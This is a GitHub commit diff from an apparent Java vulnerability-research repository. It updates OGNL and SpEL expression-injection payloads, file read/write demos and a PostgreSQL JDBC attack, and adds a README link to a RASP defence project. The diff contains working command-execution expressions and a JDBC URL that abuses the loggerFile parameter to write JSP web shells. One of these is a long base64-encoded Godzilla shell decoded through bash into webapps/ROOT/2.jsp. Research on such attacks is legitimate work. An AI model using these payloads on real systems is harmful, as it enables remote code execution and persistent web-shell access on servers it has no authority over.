Skip to content

Commit e85cce2

Browse files
WhoopsunixWhoopsunix
committed
add PPPRASP link :)
1 parent 3c830e1 commit e85cce2

File tree

6 files changed

+23
-3
lines changed

6 files changed

+23
-3
lines changed

Expression/OGNLAttack/src/main/java/org/example/OGNL.java

Lines changed: 6 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -46,7 +46,8 @@ public static void main(String[] args) {
4646
/**
4747
* base64加密
4848
*/
49-
// 原生 > JDK8 todo
49+
// 原生 > JDK8
50+
// todo 其他写法
5051
String base64Encode = "(#[email protected]@getRuntime().exec('ifconfig').getInputStream()).(@java.util.Base64@getEncoder().encodeToString((new java.util.Scanner(#inputStream).useDelimiter('\\\\A').next().getBytes())))";
5152
// // 用 IOUtils 实现
5253
String base64EncodeIOUtils = "(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec('ifconfig').getInputStream(),'UTF-8')).(#[email protected]@getEncoder().encodeToString(#str.getBytes()))";
@@ -59,6 +60,10 @@ public static void main(String[] args) {
5960
// 延时
6061
String sleep = "@java.lang.Thread@sleep(10000)";
6162

63+
/**
64+
* todo 类加载
65+
*/
66+
6267

6368
Object obj = ognlGetValue(sleep);
6469
System.out.println(obj);

Expression/SPELAttack/src/main/java/com/example/spelattack/SPEL.java

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -24,6 +24,10 @@ public static void main(String[] args) {
2424
// 延时
2525
String sleep = "T(java.lang.Thread).sleep(10000)";
2626

27+
/**
28+
* todo 类加载
29+
*/
30+
2731

2832
Object obj = spel(sleep);
2933
System.out.println(obj);

FilesOperations/src/main/java/org/example/FileRead.java

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -14,6 +14,7 @@ public class FileRead {
1414
*/
1515
public String read_InputStreamReader(String filePath) throws Exception {
1616
FileInputStream fileInputStream = new FileInputStream(filePath);
17+
1718
InputStreamReader inputStreamReader = new InputStreamReader(fileInputStream);
1819
int character;
1920
StringBuilder content = new StringBuilder();

FilesOperations/src/main/java/org/example/FileWrite.java

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -6,6 +6,13 @@
66
* @author Whoopsunix
77
*/
88
public class FileWrite {
9+
10+
public static void main(String[] args) throws Exception{
11+
String path = "/tmp/1.txt";
12+
String content = "Hello World!";
13+
new FileWrite().write_FileWriter_CharArrayWriter(path, content);
14+
}
15+
916
/**
1017
* java.io.FileWriter
1118
*/

JDBCAttack/PostgreSQLAttack/src/main/java/org/example/FileAttack.java

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -43,7 +43,8 @@ public static void main(String[] args) throws Exception {
4343
String jspExecContent = "<%Runtime.getRuntime().exec(\"open -a Calculator.app\");%>";
4444
// pass: ant type: jspjs el
4545
String antShellContent = "<%out.print(org.apache.jasper.runtime.PageContextImpl.proprietaryEvaluate(request.getParameter(\"ant\"), String.class, pageContext, null));%>";
46-
// 曲线写入 在ROOT目录下写入 godzilla默认shell 2.jsp todo 完善
46+
// 曲线写入 本质还是命令执行 在ROOT目录下写入 godzilla默认shell 2.jsp
47+
// todo 完善
4748
String godzillaShellContent = "<%Runtime.getRuntime().exec(\"bash -c {echo,ZWNobyAiPCUhIFN0cmluZyB4Yz0iM2M2ZTBiOGE5YzE1MjI0YSI7IFN0cmluZyBwYXNzPSJwYXNzIjsgU3RyaW5nIG1kNT1tZDUocGFzcyt4Yyk7IGNsYXNzIFggZXh0ZW5kcyBDbGFzc0xvYWRlcntwdWJsaWMgWChDbGFzc0xvYWRlciB6KXtzdXBlcih6KTt9cHVibGljIENsYXNzIFEoYnl0ZVtdIGNiKXtyZXR1cm4gc3VwZXIuZGVmaW5lQ2xhc3MoY2IsIDAsIGNiLmxlbmd0aCk7fSB9cHVibGljIGJ5dGVbXSB4KGJ5dGVbXSBzLGJvb2xlYW4gbSl7IHRyeXtqYXZheC5jcnlwdG8uQ2lwaGVyIGM9amF2YXguY3J5cHRvLkNpcGhlci5nZXRJbnN0YW5jZSgiQUVTIik7Yy5pbml0KG0/MToyLG5ldyBqYXZheC5jcnlwdG8uc3BlYy5TZWNyZXRLZXlTcGVjKHhjLmdldEJ5dGVzKCksIkFFUyIpKTtyZXR1cm4gYy5kb0ZpbmFsKHMpOyB9Y2F0Y2ggKEV4Y2VwdGlvbiBlKXtyZXR1cm4gbnVsbDsgfX0gcHVibGljIHN0YXRpYyBTdHJpbmcgbWQ1KFN0cmluZyBzKSB7U3RyaW5nIHJldCA9IG51bGw7dHJ5IHtqYXZhLnNlY3VyaXR5Lk1lc3NhZ2VEaWdlc3QgbTttID0gamF2YS5zZWN1cml0eS5NZXNzYWdlRGlnZXN0LmdldEluc3RhbmNlKCJNRDUiKTttLnVwZGF0ZShzLmdldEJ5dGVzKCksIDAsIHMubGVuZ3RoKCkpO3JldCA9IG5ldyBqYXZhLm1hdGguQmlnSW50ZWdlcigxLCBtLmRpZ2VzdCgpKS50b1N0cmluZygxNikudG9VcHBlckNhc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge31yZXR1cm4gcmV0OyB9IHB1YmxpYyBzdGF0aWMgU3RyaW5nIGJhc2U2NEVuY29kZShieXRlW10gYnMpIHRocm93cyBFeGNlcHRpb24ge0NsYXNzIGJhc2U2NDtTdHJpbmcgdmFsdWUgPSBudWxsO3RyeSB7YmFzZTY0PUNsYXNzLmZvck5hbWUoImphdmEudXRpbC5CYXNlNjQiKTtPYmplY3QgRW5jb2RlciA9IGJhc2U2NC5nZXRNZXRob2QoImdldEVuY29kZXIiLCBudWxsKS5pbnZva2UoYmFzZTY0LCBudWxsKTt2YWx1ZSA9IChTdHJpbmcpRW5jb2Rlci5nZXRDbGFzcygpLmdldE1ldGhvZCgiZW5jb2RlVG9TdHJpbmciLCBuZXcgQ2xhc3NbXSB7IGJ5dGVbXS5jbGFzcyB9KS5pbnZva2UoRW5jb2RlciwgbmV3IE9iamVjdFtdIHsgYnMgfSk7fSBjYXRjaCAoRXhjZXB0aW9uIGUpIHt0cnkgeyBiYXNlNjQ9Q2xhc3MuZm9yTmFtZSgic3VuLm1pc2MuQkFTRTY0RW5jb2RlciIpOyBPYmplY3QgRW5jb2RlciA9IGJhc2U2NC5uZXdJbnN0YW5jZSgpOyB2YWx1ZSA9IChTdHJpbmcpRW5jb2Rlci5nZXRDbGFzcygpLmdldE1ldGhvZCgiZW5jb2RlIiwgbmV3IENsYXNzW10geyBieXRlW10uY2xhc3MgfSkuaW52b2tlKEVuY29kZXIsIG5ldyBPYmplY3RbXSB7IGJzIH0pO30gY2F0Y2ggKEV4Y2VwdGlvbiBlMikge319cmV0dXJuIHZhbHVlOyB9IHB1YmxpYyBzdGF0aWMgYnl0ZVtdIGJhc2U2NERlY29kZShTdHJpbmcgYnMpIHRocm93cyBFeGNlcHRpb24ge0NsYXNzIGJhc2U2NDtieXRlW10gdmFsdWUgPSBudWxsO3RyeSB7YmFzZTY0PUNsYXNzLmZvck5hbWUoImphdmEudXRpbC5CYXNlNjQiKTtPYmplY3QgZGVjb2RlciA9IGJhc2U2NC5nZXRNZXRob2QoImdldERlY29kZXIiLCBudWxsKS5pbnZva2UoYmFzZTY0LCBudWxsKTt2YWx1ZSA9IChieXRlW10pZGVjb2Rlci5nZXRDbGFzcygpLmdldE1ldGhvZCgiZGVjb2RlIiwgbmV3IENsYXNzW10geyBTdHJpbmcuY2xhc3MgfSkuaW52b2tlKGRlY29kZXIsIG5ldyBPYmplY3RbXSB7IGJzIH0pO30gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7dHJ5IHsgYmFzZTY0PUNsYXNzLmZvck5hbWUoInN1bi5taXNjLkJBU0U2NERlY29kZXIiKTsgT2JqZWN0IGRlY29kZXIgPSBiYXNlNjQubmV3SW5zdGFuY2UoKTsgdmFsdWUgPSAoYnl0ZVtdKWRlY29kZXIuZ2V0Q2xhc3MoKS5nZXRNZXRob2QoImRlY29kZUJ1ZmZlciIsIG5ldyBDbGFzc1tdIHsgU3RyaW5nLmNsYXNzIH0pLmludm9rZShkZWNvZGVyLCBuZXcgT2JqZWN0W10geyBicyB9KTt9IGNhdGNoIChFeGNlcHRpb24gZTIpIHt9fXJldHVybiB2YWx1ZTsgfSU+PCV0cnl7Ynl0ZVtdIGRhdGE9YmFzZTY0RGVjb2RlKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKHBhc3MpKTtkYXRhPXgoZGF0YSwgZmFsc2UpO2lmIChzZXNzaW9uLmdldEF0dHJpYnV0ZSgicGF5bG9hZCIpPT1udWxsKXtzZXNzaW9uLnNldEF0dHJpYnV0ZSgicGF5bG9hZCIsbmV3IFgodGhpcy5nZXRDbGFzcygpLmdldENsYXNzTG9hZGVyKCkpLlEoZGF0YSkpO31lbHNle3JlcXVlc3Quc2V0QXR0cmlidXRlKCJwYXJhbWV0ZXJzIixkYXRhKTtqYXZhLmlvLkJ5dGVBcnJheU91dHB1dFN0cmVhbSBhcnJPdXQ9bmV3IGphdmEuaW8uQnl0ZUFycmF5T3V0cHV0U3RyZWFtKCk7T2JqZWN0IGY9KChDbGFzcylzZXNzaW9uLmdldEF0dHJpYnV0ZSgicGF5bG9hZCIpKS5uZXdJbnN0YW5jZSgpO2YuZXF1YWxzKGFyck91dCk7Zi5lcXVhbHMocGFnZUNvbnRleHQpO3Jlc3BvbnNlLmdldFdyaXRlcigpLndyaXRlKG1kNS5zdWJzdHJpbmcoMCwxNikpO2YudG9TdHJpbmcoKTtyZXNwb25zZS5nZXRXcml0ZXIoKS53cml0ZShiYXNlNjRFbmNvZGUoeChhcnJPdXQudG9CeXRlQXJyYXkoKSwgdHJ1ZSkpKTtyZXNwb25zZS5nZXRXcml0ZXIoKS53cml0ZShtZDUuc3Vic3RyaW5nKDE2KSk7fSB9Y2F0Y2ggKEV4Y2VwdGlvbiBlKXt9JT4gIj4gLi4vd2ViYXBwcy9ST09ULzIuanNw}|{base64,-d}|{bash,-i}\");%>";
4849
String elWriteAttackURL2 = String.format("jdbc:postgresql://127.0.0.1:5432/test/?loggerLevel=DEBUG&loggerFile=%s&%s=", writePath, godzillaShellContent);
4950
System.out.println(elWriteAttackURL2);

README.md

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -10,7 +10,9 @@ By. Whoopsunix
1010

1111
🚧 长期项目 不定期学习后更新......
1212

13-
部分 RceDemo 已经集成在二开 [ysoserial](https://github.com/Whoopsunix/ysoserial) 项目中
13+
🛰️ 部分利用已经集成在二开 [ysoserial](https://github.com/Whoopsunix/ysoserial) 项目中
14+
15+
🪝 [PPPRASP](https://github.com/Whoopsunix/PPPRASP) 项目中对本项目给出的漏洞实现防护(仅实现关键函数的 HOOK,不作进一步处理)
1416

1517
## 目录
1618

0 commit comments

Comments
 (0)